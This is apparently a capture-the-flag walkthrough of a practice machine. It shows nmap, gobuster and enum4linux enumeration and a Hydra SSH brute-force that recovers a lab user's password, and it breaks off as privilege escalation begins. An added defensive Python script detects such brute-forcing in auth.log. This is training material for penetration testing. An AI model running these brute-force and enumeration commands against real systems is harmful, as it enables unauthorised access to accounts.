This is a machine that allows you to practice web app hacking and privilege escalation.
1. Reconnaissance
1.1 Nmap
Using nmap to scan for open ports and services
nmap -sV -oA nmap-inital 10.10.60.79
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-27 19:41 IST
Nmap scan report for 10.10.60.79
Host is up (0.19s latency).
Not shown: 994 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 db:45:cb:be:4a:8b:71:f8:e9:31:42:ae:ff:f8:45:e4 (RSA)
| 256 09:b9:b9:1c:e0:bf:0e:1c:6f:7f:fe:8e:5f:20:1b:ce (ECDSA)
|_ 256 a5:68:2b:22:5f:98:4a:62:21:3d:a2:e2:c5:a9:f7:c2 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8009/tcp open ajp13?
|_ajp-methods: Failed to get a valid response for the OPTION request
8080/tcp open http-proxy
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.7
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap done: 1 IP address (1 host up) scanned in 197.68 seconds
We find open TCP ports 22, 80, 139, 445, 8009, and 8080.
2. Scanning
2.1 Gobuster
Using gobuster to brute-force directories.
gobuster dir -u http://10.10.60.79 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-small-directories.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.60.79
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-small-directories.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/03/27 19:46:55 Starting gobuster in directory enumeration mode
===============================================================
/development (Status: 301) [Size: 316] [--> http://10.10.60.79/development/]
We find a /development directory.
2.2 Web Server
Visiting the IP address in the browser, we are greeted with a webpage.
Going over to /development, we find two txt files:
dev.txt
Here we find a conversation between two users, referred to as k and j, about the use of an outdated Apache Struts version.
j.txt
From this conversation, we can conclude that user j is using a weak password which can be easily cracked.
2.3 Enum4linux
We can use Enum4linux for further enumeration via SMB (port 445).
enum4linux -a 10.10.60.79
======================================
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)
======================================
From the output, we can conclude that the k and j referred to earlier are the users kay and jan respectively.
3. Gaining Access
3.1 Hydra
Using Hydra to brute-force jan's ssh password.
hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.60.79:22
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-03-27 20:17:57
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.10.60.79:22/
[22][ssh] host: 10.10.60.79 login: jan password: armando
We get the credentials jan : armando.
Logging in via ssh:
ssh jan@10.10.60.79
jan@10.10.60.79's password:
jan@basic2:~$
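From the defender's side, the Hydra run above leaves a burst of sshd "Failed password" entries from a single source, followed by an "Accepted password" once the guess lands. The following is an added detection example, not part of the original writeup, run over constructed auth.log lines; the attacker address 10.10.14.5, the threshold and window values, and the log year are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample /var/log/auth.log lines (not captured from the target).
SAMPLE_LOG = """\
Mar 27 20:17:58 basic2 sshd[2031]: Failed password for jan from 10.10.14.5 port 40120 ssh2
Mar 27 20:17:58 basic2 sshd[2032]: Failed password for jan from 10.10.14.5 port 40122 ssh2
Mar 27 20:17:59 basic2 sshd[2033]: Failed password for invalid user admin from 10.10.14.5 port 40124 ssh2
Mar 27 20:17:59 basic2 sshd[2034]: Failed password for jan from 10.10.14.5 port 40126 ssh2
Mar 27 20:18:00 basic2 sshd[2035]: Failed password for jan from 10.10.14.5 port 40128 ssh2
Mar 27 20:18:00 basic2 sshd[2036]: Failed password for jan from 10.10.14.5 port 40130 ssh2
Mar 27 20:18:01 basic2 sshd[2037]: Accepted password for jan from 10.10.14.5 port 40132 ssh2
Mar 27 20:30:12 basic2 sshd[2101]: Failed password for kay from 192.168.1.20 port 50000 ssh2
Mar 27 20:31:40 basic2 sshd[2102]: Accepted password for kay from 192.168.1.20 port 50002 ssh2
"""

# sshd logs both plain and "invalid user" failures; capture the user in either form.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)

def parse(log_text, year=2022):
    """Yield (timestamp, result, user, ip) for each sshd password event.
    syslog omits the year, so the caller supplies it (assumed 2022 here)."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["result"], m["user"], m["ip"]

def detect_bruteforce(log_text, threshold=5, window_seconds=60):
    """Alert on any source IP with >= threshold failures inside a sliding window.
    If that IP later gets an 'Accepted', record the user: a guess likely succeeded."""
    recent = defaultdict(list)  # ip -> failure timestamps still inside the window
    alerts = {}
    for ts, result, user, ip in parse(log_text):
        if result == "Failed":
            recent[ip] = [t for t in recent[ip] if (ts - t).total_seconds() <= window_seconds]
            recent[ip].append(ts)
            if len(recent[ip]) >= threshold and ip not in alerts:
                alerts[ip] = {"first_seen": recent[ip][0], "failures": len(recent[ip]),
                              "success_after": None}
        elif result == "Accepted" and ip in alerts:
            alerts[ip]["success_after"] = user
    return alerts
```

Calling detect_bruteforce(SAMPLE_LOG) flags only 10.10.14.5, with success_after set to jan; the single failure from 192.168.1.20 stays below the threshold.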
4. Privilege Escalation
We need to be user kay to view the pass.bak file located in their home directory.
4.1 LinPeas
LinPEAS is a script that searches for possible privilege escalation vectors.
Downloading the script on the attacker machine and copying it to the /tmp directory on the target via scp.